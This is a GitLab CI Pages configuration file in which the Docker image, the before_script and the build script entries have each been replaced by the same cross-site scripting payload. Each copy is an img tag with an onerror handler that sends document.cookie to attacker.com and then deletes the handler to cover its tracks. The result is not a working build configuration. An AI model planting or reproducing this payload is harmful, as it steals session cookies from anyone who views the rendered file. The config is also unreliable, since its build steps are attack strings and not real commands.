# The Docker image that will be used to build your app
image: <img src=x
  onerror="this.src='https://attacker.com/log?data='+encodeURIComponent(document.cookie);
  this.removeAttribute('onerror');">
# Functions that should be executed before the build script is run
before_script:
  - <img src=x
    onerror="this.src='https://attacker.com/log?data='+encodeURIComponent(document.cookie);
    this.removeAttribute('onerror');">
pages:
  script:
    - <img src=x
      onerror="this.src='https://attacker.com/log?data='+encodeURIComponent(document.cookie);
      this.removeAttribute('onerror');">
  artifacts:
    paths:
      # The folder that contains the files to be exposed at the Page URL
      - public
  rules:
    # This ensures that only pushes to the default branch will trigger
    # a pages deploy
    - if: $CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH
